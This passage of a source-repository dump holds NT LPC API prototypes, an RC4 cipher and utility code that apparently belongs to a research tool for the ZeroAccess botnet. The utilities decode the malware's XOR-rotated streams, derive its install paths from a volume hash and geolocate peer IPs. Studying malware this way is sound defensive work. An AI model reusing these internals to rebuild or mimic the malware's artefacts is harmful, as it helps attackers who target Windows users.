MaxMessageLength,\n\t_In_\tULONG MaxPoolUsage\n\t);\n\nNTSTATUS NTAPI NtCompleteConnectPort(\n\t_In_\tHANDLE PortHandle\n\t);\n\nNTSTATUS NTAPI NtListenPort(\n\t_In_\tHANDLE PortHandle,\n\t_Out_\tPPORT_MESSAGE ConnectionRequest\n\t);\n\nNTSTATUS NTAPI NtReplyPort(\n\t_In_\tHANDLE PortHandle,\n\t_In_\tPPORT_MESSAGE ReplyMessage\n\t);\n\nNTSTATUS NTAPI NtReplyWaitReplyPort(\n\t_In_\tHANDLE PortHandle,\n\t_Inout_\tPPORT_MESSAGE ReplyMessage\n\t);\n\nNTSTATUS NTAPI NtRequestPort(\n\t_In_\tHANDLE PortHandle,\n\t_In_\tPPORT_MESSAGE RequestMessage\n\t);\n\nNTSTATUS NTAPI NtRequestWaitReplyPort(\n\t_In_\tHANDLE PortHandle,\n\t_In_\tPPORT_MESSAGE RequestMessage,\n\t_Out_\tPPORT_MESSAGE ReplyMessage\n\t);\n\nNTSTATUS NTAPI NtClosePort(\n\t_In_\tHANDLE PortHandle\n\t);\n\nNTSTATUS NTAPI NtReplyWaitReceivePort(\n\t_In_\t\tHANDLE PortHandle,\n\t_Out_opt_\tPVOID *PortContext,\n\t_In_opt_\tPPORT_MESSAGE ReplyMessage,\n\t_Out_\t\tPPORT_MESSAGE ReceiveMessage\n\t);\n\nNTSTATUS NTAPI NtWriteRequestData(\n\t_In_\t\tHANDLE 
PortHandle,\n\t_In_\t\tPPORT_MESSAGE Message,\n\t_In_\t\tULONG DataEntryIndex,\n\t_In_\t\tPVOID Buffer,\n\t_In_\t\tULONG BufferSize,\n\t_Out_opt_\tPULONG NumberOfBytesWritten\n\t);\n\nNTSTATUS NTAPI NtReadRequestData(\n\t_In_\t\tHANDLE PortHandle,\n\t_In_\t\tPPORT_MESSAGE Message,\n\t_In_\t\tULONG DataEntryIndex,\n\t_Out_\t\tPVOID Buffer,\n\t_In_\t\tULONG BufferSize,\n\t_Out_opt_\tPULONG NumberOfBytesRead\n\t);\n\nNTSTATUS NTAPI NtConnectPort(\n\t_Out_\t\t\tPHANDLE PortHandle,\n\t_In_\t\t\tPUNICODE_STRING PortName,\n\t_In_\t\t\tPSECURITY_QUALITY_OF_SERVICE SecurityQos,\n\t_Inout_opt_\t\tPPORT_VIEW ClientView,\n\t_Out_opt_\t\tPREMOTE_PORT_VIEW ServerView,\n\t_Out_opt_\t\tPULONG MaxMessageLength,\n\t_Inout_opt_\t\tPVOID ConnectionInformation,\n\t_Inout_opt_\t\tPULONG ConnectionInformationLength\n\t);\n\nNTSTATUS NTAPI NtAcceptConnectPort(\n\t_Out_\t\t\tPHANDLE PortHandle,\n\t_In_opt_\t\tPVOID PortContext,\n\t_In_\t\t\tPPORT_MESSAGE ConnectionRequest,\n\t_In_\t\t\tBOOLEAN AcceptConnection,\n\t_Inout_opt_\t\tPPORT_VIEW ServerView,\n\t_Out_opt_\t\tPREMOTE_PORT_VIEW ClientView\n\t);\n"
  },
  {
    "path": "Source/shared/rc4.c",
    "content": "\n/*\n* rc4.c\n*\n* Copyright (c) 1996-2000 Whistle Communications, Inc.\n* All rights reserved.\n*\n* Subject to the following obligations and disclaimer of warranty, use and\n* redistribution of this software, in source or object code forms, with or\n* without modifications are expressly permitted by Whistle Communications;\n* provided, however, that:\n* 1. Any and all reproductions of the source or object code must include the\n*    copyright notice above and the following disclaimer of warranties; and\n* 2. No rights are granted, in any manner or form, to use Whistle\n*    Communications, Inc. trademarks, including the mark \"WHISTLE\n*    COMMUNICATIONS\" on advertising, endorsements, or otherwise except as\n*    such appears in the above copyright notice or in the software.\n*\n* THIS SOFTWARE IS BEING PROVIDED BY WHISTLE COMMUNICATIONS \"AS IS\", AND\n* TO THE MAXIMUM EXTENT PERMITTED BY LAW, WHISTLE COMMUNICATIONS MAKES NO\n* REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, REGARDING THIS SOFTWARE,\n* INCLUDING WITHOUT LIMITATION, ANY AND ALL IMPLIED WARRANTIES OF\n* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT.\n* WHISTLE COMMUNICATIONS DOES NOT WARRANT, GUARANTEE, OR MAKE ANY\n* REPRESENTATIONS REGARDING THE USE OF, OR THE RESULTS OF THE USE OF THIS\n* SOFTWARE IN TERMS OF ITS CORRECTNESS, ACCURACY, RELIABILITY OR OTHERWISE.\n* IN NO EVENT SHALL WHISTLE COMMUNICATIONS BE LIABLE FOR ANY DAMAGES\n* RESULTING FROM OR ARISING OUT OF ANY USE OF THIS SOFTWARE, INCLUDING\n* WITHOUT LIMITATION, ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n* PUNITIVE, OR CONSEQUENTIAL DAMAGES, PROCUREMENT OF SUBSTITUTE GOODS OR\n* SERVICES, LOSS OF USE, DATA OR PROFITS, HOWEVER CAUSED AND UNDER ANY\n* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\n* THIS SOFTWARE, EVEN IF WHISTLE COMMUNICATIONS IS ADVISED OF THE POSSIBILITY\n* OF 
SUCH DAMAGE.\n*\n* $FreeBSD: src/sys/crypto/rc4/rc4.c,v 1.2.2.1 2000/04/18 04:48:31 archie Exp $\n*/\n\n#include \"rc4.h\"\n\nstatic __inline void\nswap_bytes(unsigned char *a, unsigned char *b)\n{\n\tunsigned char temp;\n\n\ttemp = *a;\n\t*a = *b;\n\t*b = temp;\n}\n\n/*\n* Initialize an RC4 state buffer using the supplied key,\n* which can have arbitrary non-zero length (keylen must not be 0).\n*/\nvoid\nrc4_init(rc4_state *state, const unsigned char *key, unsigned long keylen)\n{\n\tunsigned char j = 0;\n\tunsigned long i;\n\n\t/* Initialize state with identity permutation */\n\tfor (i = 0; i < 256; i++)\n\t\tstate->perm[i] = (unsigned char)i;\n\tstate->index1 = 0;\n\tstate->index2 = 0;\n\n\t/* Randomize the permutation using key data */\n\tfor (i = 0; i < 256; i++) {\n\t\tj += state->perm[i] + key[i % keylen];\n\t\tswap_bytes(&state->perm[i], &state->perm[j]);\n\t}\n}\n\n/*\n* Encrypt some data using the supplied RC4 state buffer.\n* The input and output buffers may be the same buffer.\n* Since RC4 is a stream cypher, this function is used\n* for both encryption and decryption.\n*/\nvoid\nrc4_crypt(rc4_state *state,\n\tconst unsigned char *inbuf, unsigned char *outbuf, unsigned long buflen)\n{\n\tunsigned long i;\n\tunsigned char j;\n\n\tfor (i = 0; i < buflen; i++) {\n\n\t\t/* Update modification indices */\n\t\tstate->index1++;\n\t\tstate->index2 += state->perm[state->index1];\n\n\t\t/* Modify permutation */\n\t\tswap_bytes(&state->perm[state->index1],\n\t\t\t&state->perm[state->index2]);\n\n\t\t/* Encrypt/decrypt next byte */\n\t\tj = state->perm[state->index1] + state->perm[state->index2];\n\t\toutbuf[i] = inbuf[i] ^ state->perm[j];\n\t}\n}\n"
  },
  {
    "path": "Source/shared/rc4.h",
    "content": "/*\n* rc4.h\n*\n* Copyright (c) 1996-2000 Whistle Communications, Inc.\n* All rights reserved.\n*\n* Subject to the following obligations and disclaimer of warranty, use and\n* redistribution of this software, in source or object code forms, with or\n* without modifications are expressly permitted by Whistle Communications;\n* provided, however, that:\n* 1. Any and all reproductions of the source or object code must include the\n*    copyright notice above and the following disclaimer of warranties; and\n* 2. No rights are granted, in any manner or form, to use Whistle\n*    Communications, Inc. trademarks, including the mark \"WHISTLE\n*    COMMUNICATIONS\" on advertising, endorsements, or otherwise except as\n*    such appears in the above copyright notice or in the software.\n*\n* THIS SOFTWARE IS BEING PROVIDED BY WHISTLE COMMUNICATIONS \"AS IS\", AND\n* TO THE MAXIMUM EXTENT PERMITTED BY LAW, WHISTLE COMMUNICATIONS MAKES NO\n* REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, REGARDING THIS SOFTWARE,\n* INCLUDING WITHOUT LIMITATION, ANY AND ALL IMPLIED WARRANTIES OF\n* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT.\n* WHISTLE COMMUNICATIONS DOES NOT WARRANT, GUARANTEE, OR MAKE ANY\n* REPRESENTATIONS REGARDING THE USE OF, OR THE RESULTS OF THE USE OF THIS\n* SOFTWARE IN TERMS OF ITS CORRECTNESS, ACCURACY, RELIABILITY OR OTHERWISE.\n* IN NO EVENT SHALL WHISTLE COMMUNICATIONS BE LIABLE FOR ANY DAMAGES\n* RESULTING FROM OR ARISING OUT OF ANY USE OF THIS SOFTWARE, INCLUDING\n* WITHOUT LIMITATION, ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n* PUNITIVE, OR CONSEQUENTIAL DAMAGES, PROCUREMENT OF SUBSTITUTE GOODS OR\n* SERVICES, LOSS OF USE, DATA OR PROFITS, HOWEVER CAUSED AND UNDER ANY\n* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\n* THIS SOFTWARE, EVEN IF WHISTLE COMMUNICATIONS IS ADVISED OF THE POSSIBILITY\n* OF 
SUCH DAMAGE.\n*\n* $FreeBSD: src/sys/crypto/rc4/rc4.h,v 1.2.2.1 2000/04/18 04:48:32 archie Exp $\n*/\n\n#ifndef _SYS_CRYPTO_RC4_RC4_H_\n#define _SYS_CRYPTO_RC4_RC4_H_\n#pragma once\n\ntypedef struct _rc4_state {\n\tunsigned char\tperm[256];\n\tunsigned char\tindex1;\n\tunsigned char\tindex2;\n} rc4_state;\n\nextern void rc4_init(rc4_state *state, const unsigned char *key, unsigned long keylen);\nextern void rc4_crypt(rc4_state *state,\tconst unsigned char *inbuf, unsigned char *outbuf, unsigned long buflen);\n\n#endif\n"
  },
  {
    "path": "Source/shared/util.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n*  TITLE:       UTIL.C\n*\n*  VERSION:     1.01\n*\n*  DATE:        01 Dec 2017\n*\n*  ZeroAccess support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n/*\n* SfuDecodeStream\n*\n* Purpose:\n*\n* Decode ZeroAccess stream using given key.\n*\n*/\nVOID SfuDecodeStream(\n    _Inout_ unsigned char *stream,\n    _In_ size_t size,\n    _In_ unsigned long key\n)\n{\n    unsigned long *p = (unsigned long *)stream;\n\n    size >>= 2;\n    while (size > 0) {\n        *p ^= key;\n        key = _rotl(key, 1);\n        p++;\n        size--;\n    }\n}\n\n/*\n* SfuWriteBufferToFile\n*\n* Purpose:\n*\n* Create new file (or open existing) and write (append) buffer to it.\n*\n*/\nULONG_PTR SfuWriteBufferToFile(\n    _In_ PWSTR lpFileName,\n    _In_ PVOID Buffer,\n    _In_ SIZE_T Size,\n    _In_ BOOL Flush,\n    _In_ BOOL Append\n)\n{\n    NTSTATUS          Status;\n    DWORD             dwFlag;\n    HANDLE             hFile = NULL;\n    OBJECT_ATTRIBUTES  attr;\n    UNICODE_STRING     NtFileName;\n    IO_STATUS_BLOCK    IoStatus;\n    LARGE_INTEGER      Position;\n    ACCESS_MASK        DesiredAccess;\n    PLARGE_INTEGER     pPosition = NULL;\n    ULONG_PTR          nBlocks, BlockIndex, BytesWritten = 0;\n    ULONG              BlockSize, RemainingSize;\n    PBYTE              ptr = (PBYTE)Buffer;\n\n    if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)\n        return 0;\n\n    DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;\n    dwFlag = FILE_OVERWRITE_IF;\n\n    if 
(Append) {\n        DesiredAccess |= FILE_READ_ACCESS;\n        dwFlag = FILE_OPEN_IF;\n    }\n\n    InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);\n\n    __try {\n        Status = NtCreateFile(&hFile, DesiredAccess, &attr,\n            &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,\n            FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n\n        if (!NT_SUCCESS(Status))\n            __leave;\n\n        pPosition = NULL;\n\n        if (Append) {\n            Position.LowPart = FILE_WRITE_TO_END_OF_FILE;\n            Position.HighPart = -1;\n            pPosition = &Position;\n        }\n\n        BlockSize = 0x7FFFFFFF;\n        nBlocks = (Size / BlockSize);\n        for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {\n\n            Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);\n            if (!NT_SUCCESS(Status))\n                __leave;\n\n            ptr += BlockSize;\n            BytesWritten += IoStatus.Information;\n        }\n        RemainingSize = Size % BlockSize;\n        if (RemainingSize != 0) {\n            Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);\n            if (!NT_SUCCESS(Status))\n                __leave;\n            BytesWritten += IoStatus.Information;\n        }\n\n    }\n    __finally {\n        if (hFile != NULL) {\n            if (Flush) NtFlushBuffersFile(hFile, &IoStatus);\n            NtClose(hFile);\n        }\n        RtlFreeUnicodeString(&NtFileName);\n    }\n    return BytesWritten;\n}\n\n/*\n* SfuQueryEnvironmentVariableOffset\n*\n* Purpose:\n*\n* Return offset to the given environment variable.\n*\n*/\nLPWSTR SfuQueryEnvironmentVariableOffset(\n    PUNICODE_STRING Value\n)\n{\n    UNICODE_STRING   str1;\n    PWCHAR           EnvironmentBlock, ptr;\n\n    EnvironmentBlock = RtlGetCurrentPeb()->ProcessParameters->Environment;\n    ptr = EnvironmentBlock;\n\n    do {\n      
  if (*ptr == 0)\n            return 0;\n\n        RtlSecureZeroMemory(&str1, sizeof(str1));\n        RtlInitUnicodeString(&str1, ptr);\n        if (RtlPrefixUnicodeString(Value, &str1, TRUE))\n            break;\n\n        ptr += _strlen(ptr) + 1;\n\n    } while (1);\n\n    return (ptr + Value->Length / sizeof(WCHAR));\n}\n\n/*\n* SfuBuildBotPath\n*\n* Purpose:\n*\n* Return full path to bot in both variants.\n*\n*/\nBOOL SfuBuildBotPath(\n    _Inout_ PZA_BOT_PATH Context\n)\n{\n    BOOL                           cond = FALSE, bResult = FALSE;\n    OBJECT_ATTRIBUTES              obja;\n    UNICODE_STRING                 ustr1, ustr2;\n    WCHAR                          szRegBuffer[MAX_PATH + 1];\n    HANDLE                         ProcessHeap;\n    HANDLE                         hKey = NULL;\n    NTSTATUS                       status;\n    KEY_VALUE_PARTIAL_INFORMATION *pki = NULL;\n    LPWSTR                         lpEnv;\n    ULONG                          memIO = 0;\n    LPWSTR                         lpLocalBotName, lpPFilesBotName;\n    PVOID                          Wow64Information = NULL;\n\n    GUID sfGUID;\n\n    if (Context == NULL)\n        return bResult;\n\n    ProcessHeap = RtlGetCurrentPeb()->ProcessHeap;\n\n    RtlSecureZeroMemory(&ustr1, sizeof(ustr1));\n\n    do {\n\n        if (!SfInitMD5())\n            break;\n\n        RtlSecureZeroMemory(&sfGUID, sizeof(sfGUID));\n        SfuCalcVolumeMD5((BYTE*)&sfGUID);\n\n        status = NtQueryInformationProcess(NtCurrentProcess(), ProcessWow64Information,\n            &Wow64Information, sizeof(PVOID), NULL);\n        if (!NT_SUCCESS(status))\n            break;\n\n        //query current user registry string\n        if (!NT_SUCCESS(RtlFormatCurrentUserKeyPath(&ustr1)))\n            break;\n\n        lpLocalBotName = Context->szBotPathLocal;\n        lpPFilesBotName = Context->szBotPathPFiles;\n\n        RtlSecureZeroMemory(&szRegBuffer, sizeof(szRegBuffer));\n        wsprintf(szRegBuffer, 
T_SHELL_FOLDERS_KEY, ustr1.Buffer);\n\n        RtlFreeUnicodeString(&ustr1);\n\n        //open User Shell Folders key to query Local AppData value\n        RtlSecureZeroMemory(&ustr2, sizeof(ustr2));\n        RtlInitUnicodeString(&ustr2, szRegBuffer);\n        InitializeObjectAttributes(&obja, &ustr2, OBJ_CASE_INSENSITIVE, NULL, NULL);\n        status = NtOpenKey(&hKey, KEY_READ, &obja);\n        if (!NT_SUCCESS(status))\n            break;\n\n        //query value size\n        RtlInitUnicodeString(&ustr2, T_LOCAL_APPDATA_VALUE);\n        NtQueryValueKey(hKey, &ustr2, KeyValuePartialInformation,\n            NULL, 0, &memIO);\n\n        if (memIO == 0)\n            break;\n\n        pki = RtlAllocateHeap(ProcessHeap, HEAP_ZERO_MEMORY, memIO);\n        if (pki == NULL)\n            break;\n\n        //query value\n        status = NtQueryValueKey(hKey, &ustr2, KeyValuePartialInformation,\n            pki, memIO, &memIO);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        RtlInitUnicodeString(&ustr2, (WCHAR*)pki->Data);\n        memIO = 0;\n\n        //expand environment variable inside value\n        RtlSecureZeroMemory(&szRegBuffer, sizeof(szRegBuffer));\n        ustr1.Buffer = szRegBuffer;\n        ustr1.Length = 0;\n        ustr1.MaximumLength = sizeof(szRegBuffer);\n\n        status = RtlExpandEnvironmentStrings_U(NULL, &ustr2, &ustr1, &memIO);\n        if (!NT_SUCCESS(status)) {\n            ustr1.Buffer = NULL;\n            break;\n        }\n\n        //build result string\n        _strcpy(lpLocalBotName, T_GLOBAL_LINK);\n        _strcat(lpLocalBotName, szRegBuffer);\n\n        wsprintf(_strend(lpLocalBotName), T_SIREFEF_DIRECTORY,\n            sfGUID.Data1, sfGUID.Data2, sfGUID.Data3,\n            sfGUID.Data4[0],\n            sfGUID.Data4[1],\n            sfGUID.Data4[2],\n            sfGUID.Data4[3],\n            sfGUID.Data4[4],\n            sfGUID.Data4[5],\n            sfGUID.Data4[6],\n            sfGUID.Data4[7]);\n\n        
ustr1.Buffer = NULL;\n\n        _strcpy(lpPFilesBotName, T_GLOBAL_LINK);\n\n        if (Wow64Information == NULL) {\n            lpEnv = L\"ProgramFiles=\";\n        }\n        else {\n            lpEnv = L\"ProgramFiles(x86)=\";\n        }\n\n        RtlInitUnicodeString(&ustr2, lpEnv);\n        lpEnv = SfuQueryEnvironmentVariableOffset(&ustr2);\n        if (lpEnv) {\n            _strcat(lpPFilesBotName, lpEnv);\n\n            wsprintf(_strend(lpPFilesBotName), T_SIREFEF_DIRECTORY,\n                sfGUID.Data1, sfGUID.Data2, sfGUID.Data3,\n                sfGUID.Data4[0],\n                sfGUID.Data4[1],\n                sfGUID.Data4[2],\n                sfGUID.Data4[3],\n                sfGUID.Data4[4],\n                sfGUID.Data4[5],\n                sfGUID.Data4[6],\n                sfGUID.Data4[7]);\n        }\n\n        bResult = TRUE;\n\n    } while (cond);\n\n    if (hKey != NULL) {\n        NtClose(hKey);\n    }\n\n    if (ustr1.Buffer != NULL) {\n        RtlFreeUnicodeString(&ustr1);\n    }\n\n    if (pki != NULL) {\n        RtlFreeHeap(ProcessHeap, 0, pki);\n    }\n    return bResult;\n}\n\n/*\n* SfuWhoisInit\n*\n* Purpose:\n*\n* Establish connection with freegeoip whois service.\n*\n*/\nSOCKET SfuWhoisInit(\n    VOID\n)\n{\n    SOCKET           Socket = 0;\n    WSADATA          wsaData;\n    struct addrinfo  *result = NULL;\n    struct addrinfo  hints;\n    struct addrinfo  *ptr = NULL;\n\n    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {\n        return INVALID_SOCKET;\n    }\n\n    RtlSecureZeroMemory(&hints, sizeof(hints));\n    hints.ai_family = AF_INET;\n    hints.ai_socktype = SOCK_STREAM;\n\n    if (getaddrinfo(\"freegeoip.net\", \"80\", &hints, &result) != 0)\n        return INVALID_SOCKET;\n\n    for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {\n        if (ptr->ai_family == AF_INET) {\n\n            Socket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol);\n            if (Socket == INVALID_SOCKET)\n                
continue;\n\n            if (connect(Socket, ptr->ai_addr, (int)ptr->ai_addrlen) == SOCKET_ERROR) {\n                //do not leak or return a socket that failed to connect\n                closesocket(Socket);\n                Socket = INVALID_SOCKET;\n                continue;\n            }\n\n            break;\n        }\n    }\n\n    //release the whole list returned by getaddrinfo, not the loop cursor\n    freeaddrinfo(result);\n    return Socket;\n}\n\n/*\n* SfuWhoisClose\n*\n* Purpose:\n*\n* Close whois request socket.\n*\n*/\nVOID SfuWhoisClose(\n    _In_ SOCKET Socket\n)\n{\n    if (Socket != INVALID_SOCKET) {\n        closesocket(Socket);\n    }\n}\n\n/*\n* SfuWhois\n*\n* Purpose:\n*\n* Send whois query and return actual result data as unicode string.\n*\n*/\nBOOL SfuWhois(\n    _In_ UINT_PTR WhoisSocket,\n    _In_ ZA_PEERINFO *Peer,\n    _Inout_ UNICODE_STRING *ReturnedInfo\n)\n{\n    BYTE*               pIP;\n    int                 r = 0;\n    unsigned long\t    p = 0, c, i;\n    unsigned __int64\tContentLength = 0;\n    char                Buffer[4096];\n\n    ANSI_STRING Src;\n    BOOL bResult = FALSE;\n\n    if (\n        (Peer == NULL) ||\n        (WhoisSocket == INVALID_SOCKET) ||\n        (ReturnedInfo == NULL)\n        )\n    {\n        return bResult;\n    }\n\n    pIP = (BYTE*)&Peer->IP;\n\n    RtlSecureZeroMemory(&Buffer, sizeof(Buffer));\n    wsprintfA(Buffer, \"GET /csv/%u.%u.%u.%u HTTP/1.1\\r\\nHost: freegeoip.net\\r\\nConnection: Keep-Alive\\r\\n\\r\\n\",\n        pIP[0], pIP[1], pIP[2], pIP[3]\n    );\n\n    send(WhoisSocket, Buffer, (DWORD)_strlen_a(Buffer), 0);\n\n    do {\n        RtlSecureZeroMemory(Buffer, sizeof(Buffer));\n\n        //leave the last byte zero so the response stays NUL-terminated\n        r = recv(WhoisSocket, Buffer, sizeof(Buffer) - 1, 0);\n        if (r <= 0)\n            break;\n\n        if ((_strncmpi_a(\"HTTP/1.0 200 \", Buffer, 13) != 0) && (_strncmpi_a(\"HTTP/1.1 200 \", Buffer, 13) != 0))\n            break;\n\n        c = r;\n        i = 0;\n        do {\n            p = i;\n            //check the bound before reading the byte\n            while ((i < c) && (Buffer[i] != '\\r'))\n                i++;\n            if (p == i) {\n                i += 2;\n                break;\n            }\n            i += 2;\n            if (_strncmpi_a(\"Content-Length: \", &Buffer[p], 16) == 0)\n  
              ContentLength = strtou64_a(&Buffer[p + 16]);\n\n        } while (i < c);\n\n        if ((ContentLength < 20) || (ContentLength > 1024))\n            break;\n\n        //header scan can step up to two bytes past the received data, keep the body pointer inside Buffer\n        if (i >= sizeof(Buffer))\n            break;\n\n        RtlSecureZeroMemory(&Src, sizeof(Src));\n        RtlInitString(&Src, &Buffer[i]);\n        if (NT_SUCCESS(RtlAnsiStringToUnicodeString(ReturnedInfo, &Src, TRUE)))\n            bResult = TRUE;\n\n        r = 0;\n\n    } while (r > 0);\n\n    return bResult;\n}\n\n/*\n* SfuCalcVolumeMD5\n*\n* Purpose:\n*\n* Calculate MD5 from system volume information.\n*\n*/\nBOOLEAN SfuCalcVolumeMD5(\n    _Inout_ PBYTE MD5Hash\n)\n{\n    OBJECT_ATTRIBUTES           obja;\n    IO_STATUS_BLOCK             iost;\n    UNICODE_STRING              str;\n    NTSTATUS                    Status;\n    BOOLEAN                     result = FALSE;\n    HANDLE                      hVolume = NULL;\n    FILE_FS_VOLUME_INFORMATION  fsVolumeInfo;\n    MD5_CTX                     ctx;\n\n    if (MD5Hash == NULL)\n        return result;\n\n    RtlSecureZeroMemory(&str, sizeof(str));\n    RtlInitUnicodeString(&str, L\"\\\\systemroot\");\n    InitializeObjectAttributes(&obja, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n    Status = NtOpenFile(&hVolume, FILE_GENERIC_READ, &obja, &iost,\n        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_SYNCHRONOUS_IO_NONALERT);\n\n    if (NT_SUCCESS(Status)) {\n\n        Status = NtQueryVolumeInformationFile(hVolume, &iost, &fsVolumeInfo,\n            sizeof(FILE_FS_VOLUME_INFORMATION), FileFsVolumeInformation);\n\n        if ((NT_SUCCESS(Status) || Status == STATUS_BUFFER_OVERFLOW)) {\n            fsVolumeInfo.VolumeCreationTime.HighPart ^= 0x1010101;\n            MD5Init(&ctx);\n            MD5Update(&ctx, (unsigned char*)&fsVolumeInfo.VolumeCreationTime, sizeof(LARGE_INTEGER));\n            MD5Final(&ctx);\n            RtlCopyMemory(MD5Hash, &ctx.buf, 16);\n            result = TRUE;\n        }\n        NtClose(hVolume);\n    }\n    return result;\n}\n\n/*\n* 
SfuCreateFileMappingNoExec\n*\n* Purpose:\n*\n* Map file as non executable image.\n*\n*/\nPVOID SfuCreateFileMappingNoExec(\n    _In_ LPWSTR lpFileName\n)\n{\n    BOOL                   cond = FALSE;\n    NTSTATUS               status;\n    UNICODE_STRING         usFileName;\n    HANDLE                 hFile = NULL, hSection = NULL;\n    OBJECT_ATTRIBUTES      obja;\n    IO_STATUS_BLOCK        iost;\n    SIZE_T                 ViewSize = 0;\n    PVOID                  Data = NULL;\n\n    RtlSecureZeroMemory(&usFileName, sizeof(usFileName));\n\n    do {\n\n        if (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)\n            break;\n\n        InitializeObjectAttributes(&obja, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n        status = NtOpenFile(&hFile, FILE_READ_ACCESS | SYNCHRONIZE,\n            &obja, &iost, FILE_SHARE_READ,\n            FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,\n            NULL, PAGE_READONLY, SEC_IMAGE_NO_EXECUTE, hFile);\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = NtMapViewOfSection(hSection, NtCurrentProcess(),\n            (PVOID)&Data, 0, 0, NULL, &ViewSize, ViewUnmap, 0, PAGE_READONLY);\n        if (!NT_SUCCESS(status))\n            break;\n\n    } while (cond);\n\n    if (hFile != NULL) {\n        NtClose(hFile);\n    }\n    if (hSection != NULL) {\n        NtClose(hSection);\n    }\n    if (usFileName.Buffer != NULL) {\n        RtlFreeUnicodeString(&usFileName);\n    }\n    return Data;\n}\n\n/*\n* SftListThreadPriv\n*\n* Purpose:\n*\n* Test unit for thread elevation check.\n*\n*/\nVOID SftListThreadPriv(\n    VOID\n)\n{\n    DWORD              dwLen;\n    BOOL               bRes;\n    HANDLE             hToken;\n    BYTE               *Buffer;\n    TOKEN_PRIVILEGES   *pPrivs;\n    WCHAR              text[MAX_PATH];\n\n    if 
(!OpenThreadToken(NtCurrentThread(), TOKEN_QUERY, FALSE, &hToken))\n        return;\n\n    dwLen = 0;\n    bRes = GetTokenInformation(\n        hToken,\n        TokenPrivileges,\n        NULL,\n        0,\n        &dwLen\n    );\n\n    Buffer = LocalAlloc(LPTR, dwLen);\n    if (Buffer) {\n\n        bRes = GetTokenInformation(\n            hToken,\n            TokenPrivileges,\n            Buffer,\n            dwLen,\n            &dwLen\n        );\n\n        pPrivs = (TOKEN_PRIVILEGES*)Buffer;\n        for (DWORD i = 0; i < pPrivs->PrivilegeCount; i++) {\n            if (pPrivs->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED) {\n                text[0] = 0;\n                ultostr(pPrivs->Privileges[i].Luid.LowPart, text);\n                _strcat(text, TEXT(\"\\r\\n\"));\n                OutputDebugString(text);\n            }\n        }\n        LocalFree(Buffer);\n    }\n    CloseHandle(hToken);\n}\n\n/*\n* SfuGetSystemInfo\n*\n* Purpose:\n*\n* Wrapper for NtQuerySystemInformation.\n*\n*/\nPVOID SfuGetSystemInfo(\n    _In_ SYSTEM_INFORMATION_CLASS InfoClass\n)\n{\n    INT\t\t\tc = 0;\n    PVOID\t\tBuffer = NULL;\n    ULONG\t\tSize = 0x1000;\n    NTSTATUS\tstatus;\n    ULONG       memIO;\n    PVOID       hHeap = NtCurrentPeb()->ProcessHeap;\n\n    do {\n        Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);\n        if (Buffer != NULL) {\n            status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);\n        }\n        else {\n            return NULL;\n        }\n        if (status == STATUS_INFO_LENGTH_MISMATCH) {\n            RtlFreeHeap(hHeap, 0, Buffer);\n            Buffer = NULL;\n            Size *= 2;\n            c++;\n            if (c > 100) {\n                status = STATUS_SECRET_TOO_LONG;\n                break;\n            }\n        }\n    } while (status == STATUS_INFO_LENGTH_MISMATCH);\n\n    if (NT_SUCCESS(status)) {\n        return Buffer;\n    }\n\n    if (Buffer) {\n        RtlFreeHeap(hHeap, 0, 
